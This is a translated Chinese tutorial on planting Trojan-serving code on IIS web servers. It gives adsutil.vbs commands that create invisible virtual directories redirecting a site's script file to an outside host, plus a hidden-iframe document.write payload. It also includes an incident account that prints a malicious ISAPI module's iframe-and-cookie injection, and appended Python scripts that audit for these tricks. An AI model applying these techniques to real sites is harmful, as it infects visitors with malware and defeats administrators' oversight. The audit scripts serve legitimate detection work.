The latest way to "hang a horse" (plant Trojan-serving code on a site) without write permission _ Security Tutorial

Source: Internet
Author: User
Tags html tags script tag
On some foreign machines, even after you have obtained some permissions, for whatever reason you cannot write anything, and when you do manage to write a file it soon gets changed back, which is really infuriating. It is said that there is software that monitors important files and restores them as soon as a change is detected. If it watches the Web directory, for example, we cannot change anything on the website. However, after reading many articles by experts and doing a little research of my own, I finally worked something out: without writing any file at all, it is possible to alter someone else's pages and do the "horse hanging" that everyone talks about. I will introduce it here. Administrators who only know how to be diligent must be careful too!

As we all know, when we browse a site the server processes the information into HTML and returns it to us. What we want is to change the content the browser receives when visitors come, so that it quietly runs our things, such as Trojans. The most common way is to introduce a frame with its properties set so that it is invisible on the page, or, for the reckless, a JavaScript jump. A more advanced approach uses HTML elements already in the original code, such as a script tag or a frame tag, and tampers with the files or pages those tags pull in, or changes database content that is displayed on the home page, for example by modifying a bulletin in the database. But all of these require adding something to the original server code or modifying the site's content. Whether it is done cross-site or by editing the original code directly, it is extremely easy to spot, and with a diligent administrator your things will not stay on the server for long! And if some pages are not writable, we are stuck as well. So a more covert and more reliable way of hanging a horse is needed to solve these problems!

Let's take a look at IIS Manager first! Select a page and look at its properties, as shown in Figure 1. There is a resource redirection option! If we redirect this page to a page that we already control, then when a browser requests it, the browser is sent to the page we have defined. And if that page carries a Trojan? Obviously the visitor gets infected! This only requires changing the page's redirection in IIS, and anyone who has access to IIS Manager can do it easily. But there is still a problem. If the administrator notices that the page always jumps elsewhere, checks the site's files, and finds that restoring from backup does not solve the problem, he will certainly go and look in IIS. Once he looks at the home page's properties he will see where the problem is and can change it back!

So let's go on and see whether there is a more hidden way! Borrowing from the earlier horse-hanging methods: since the home page itself is easy to check, look at the HTML tags in the home page instead. If it pulls in other files, that makes things easy. For example, suppose the home page contains this tag:

<script src=include/mm2.js></script>

Then we have a way: modify the properties of include/mm2.js, as shown in Figure 2, and redirect it to one of our pages. Of course, the content there must be something that can be interpreted inside the script tag, such as:

document.write("<iframe style=display:none; src=http://jnclovesw.com width=0 height=0></iframe>");

So we can bring in our page! Of course, it is best to implement the original JS file's functionality first; that makes it hidden enough. Now the administrator will find that the home page has not changed, that the home page's properties in IIS have not changed, and that not a single WWW file on the host has been modified. He will be very frustrated! Even restoring the site from an earlier backup will not change the page back. There are so many files in IIS that he cannot check the properties of each one. One point to note: the file you choose to redirect must be one whose referencing HTML tag will interpret the result, otherwise it has no effect. For example, redirecting 1.jpg to our Trojan page is useless, because the Trojan page is not interpreted as HTML but handed to the IMG tag as a picture. The tags I can think of using are script and frame. As for CSS, I think it could be used, but I have not found a way to do so. I do not know whether my analysis is right, and corrections are welcome!

Let's go on! Suppose the administrator is tough or diligent enough to find out that you have done something to mm2.js, and changes it back in IIS. Our dream is shattered again! Is there a still more covert approach, one the admin cannot find in IIS? The answer is YES! You will remember the IIS configuration vulnerability from a long time ago: you can create an invisible virtual directory and then put a backdoor inside. We can borrow that here! The principle of the IIS configuration vulnerability is to create a virtual directory with no physical directory, so that it is not visible in IIS, and then do some tricks in that directory. Here we first create an invisible virtual directory. If the home page calls a JS file under the include folder, we create the include directory. This can be done with the IIS scripts: adsutil.vbs is located under the IIS installation directory, for example C:\Inetpub\AdminScripts, and is a script that controls IIS behavior. The commands we use are as follows:

cscript adsutil.vbs Create w3svc/1/root/www/include "IIsWebVirtualDir"

This creates a virtual directory that is not visible in IIS: because its path is not set, it is not displayed! Then, inside this directory, create a virtual directory named mm2.js, hehe! A virtual directory's name can contain special characters:

cscript adsutil.vbs Create w3svc/1/root/www/include/mm2.js "IIsWebVirtualDir"

Now there is an include/mm2.js virtual directory! What comes to mind? Isn't that the same name as the file the home page calls? Let's keep going!

cscript adsutil.vbs set w3svc/1/root/www/include/mm2.js/httpredirect "http://jnclovesw.com/mm1.js"

This changes the redirection property of the mm2.js virtual directory, as shown in Figure 3. Note that w3svc/1/root/www/ represents the www virtual directory of the first Web server under IIS. If you are not sure of the path, you can use the adsutil.vbs enum parameter to look up the Web site you want to change; for other operations, open the adsutil.vbs script and read its help. With the virtual directory's redirection set, now try requesting include/mm2.js from the home page. Do you think it returns the content of mm2.js or of our mm1.js? The answer is mm1.js, as shown in Figure 4, and the physical file still exists! This may simply be how IIS works: when it processes a user's request, the virtual directory takes precedence over the physical file. Then we go to IIS to see whether an include virtual directory is shown. As Figure 5 shows, no! This lets us get around both the permission limits and the administrator's checks, and place our Trojan on the other party's website. Unless the other party rebuilds IIS or deletes our hidden virtual directory, it is very hard for him to clear our Trojan!

The article is very simple; the key is the IIS script commands and some knowledge of IIS. This method is suited to hanging a horse with administrator rights, and it is very effective against administrators who are merely diligent! From now on, when you find that a site has problems, remember to use this script to check whether something is wrong. Or simply back up the IIS settings, and when you run into problems, restore the IIS settings as well, hehe!
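The check recommended above can be automated. The following is an added example, not code from the original article: it audits a text listing of the IIS metabase for the three states the article relies on (a virtual directory with no Path, a virtual directory named like a file, and any key carrying HttpRedirect). The listing layout, the sample data and the example.invalid host are constructed assumptions; only the property names KeyType, Path and HttpRedirect and the key paths come from IIS and the article.

```python
import re
from urllib.parse import urlparse

# Constructed sample, NOT captured output. Assumed layout: a "[key]" header
# followed by `Name : (TYPE) "value"` lines for that metabase key.
SAMPLE = r'''
[/w3svc/1/root/www]
KeyType      : (STRING) "IIsWebVirtualDir"
Path         : (STRING) "d:\wwwroot\www"
[/w3svc/1/root/www/include]
KeyType      : (STRING) "IIsWebVirtualDir"
[/w3svc/1/root/www/include/mm2.js]
KeyType      : (STRING) "IIsWebVirtualDir"
HttpRedirect : (STRING) "http://redirect.example.invalid/mm1.js"
'''

KEY = re.compile(r'^\[(/[^\]]+)\]$')
PROP = re.compile(r'^(\w+)\s*:\s*\(\w+\)\s*"(.*)"$')

def parse_listing(text):
    """Return {metabase key: {property name: value}}, names lower-cased."""
    keys, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if m := KEY.match(line):
            current = keys.setdefault(m[1].lower(), {})
        elif (m := PROP.match(line)) and current is not None:
            current[m[1].lower()] = m[2]
    return keys

def audit(keys):
    """Flag the metabase states the article relies on."""
    findings = []
    for key, props in sorted(keys.items()):
        reasons = []
        if props.get("keytype", "").lower() == "iiswebvirtualdir":
            if not props.get("path"):  # per the article, not shown in IIS Manager
                reasons.append("virtual directory without Path")
            if re.search(r"\.\w{1,5}$", key.rsplit("/", 1)[-1]):
                reasons.append("virtual directory named like a file")
        if target := props.get("httpredirect"):
            # Drop any redirect flags that follow the URL after a comma.
            host = urlparse(target.split(",")[0].strip()).hostname
            reasons.append(f"HttpRedirect to {host}")
        if reasons:
            findings.append((key, reasons))
    return findings

if __name__ == "__main__":
    for key, reasons in audit(parse_listing(SAMPLE)):
        print(key, "->", "; ".join(reasons))
```

Comparing the findings against a listing saved when the server was known to be clean separates intentional redirects from new ones.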


2. The entire server is serving the horse, but the injected code cannot be found in the Web page source files
On one server, almost every page of every Web site, even plain HTML pages, showed the following when opened:

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

Code of this kind usually appears in the head section, and anti-virus software reports a virus when the page is opened.

But when you open the source of the HTML, ASP or PHP page itself, this piece cannot be found.

At first I suspected JS and searched for a long time without finding anything; even a newly created HTML page would have this code.

To track down the problem, open IIS and go through its settings again: right-click the main IIS node, choose Properties, and look at ISAPI. There I found an ISAPI extension I had not seen before.

The path was C:\windows\help\wanps.dll, and the ISAPI showed as loaded normally (green status).

After removing it and restarting IIS, all of the code disappeared.

The add-in contains three files:


The content of wanps.ini is:


Cookie=gag5=abcdefg
Redirector=c:\windows\help\wanps.txt

The content of wanps.txt is:


<body>
<iframe src="http://xxx.com/web.htm" height=0 width=0></iframe>
<script language="JavaScript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24 * 60 * 60 * 1000);
document.cookie = "gag5=abcdefg;expires=" + expires.toGMTString();
-->
</script>
</body>
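The symptom in this section, markup in the served page that is absent from the file on disk, can be checked mechanically. The following is an added example, not part of the original article: it lists the iframe, frame and script tags that appear in a served response but not in the on-disk source, and marks the zero-sized or hidden ones. The sample pages and the example.invalid host are constructed.

```python
from collections import Counter
from html.parser import HTMLParser

ACTIVE_TAGS = {"iframe", "frame", "script"}  # tags that pull in or run content


class _TagCollector(HTMLParser):
    """Collects (tag, attributes) for every active tag in a document."""

    def __init__(self):
        super().__init__()
        self.found = Counter()

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            key = tuple(sorted((k, v or "") for k, v in attrs))
            self.found[(tag, key)] += 1


def active_tags(html):
    collector = _TagCollector()
    collector.feed(html)
    collector.close()
    return collector.found


def is_hidden(attrs):
    """Zero-sized or display:none, as in the frames quoted on this page."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style)


def served_only(disk_html, served_html):
    """Active tags the server sent that the source file does not contain."""
    extra = active_tags(served_html) - active_tags(disk_html)
    return [{"tag": tag, "attrs": dict(attrs), "hidden": is_hidden(dict(attrs))}
            for tag, attrs in extra.elements()]


# Constructed sample: the file on disk and the body the web server returned.
DISK = '<html><head><script src="include/mm2.js"></script></head><body>Hi</body></html>'
SERVED = ('<html><head><script src="include/mm2.js"></script></head><body>'
          '<iframe src="http://injected.example.invalid/web.htm" height=0 width=0>'
          '</iframe><script language="JavaScript">document.cookie="k=v";</script>'
          'Hi</body></html>')

if __name__ == "__main__":
    for item in served_only(DISK, SERVED):
        print(item)
```

A non-empty result for a static HTML file means the change is being made in the web server itself, which is where the ISAPI entry above was found.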
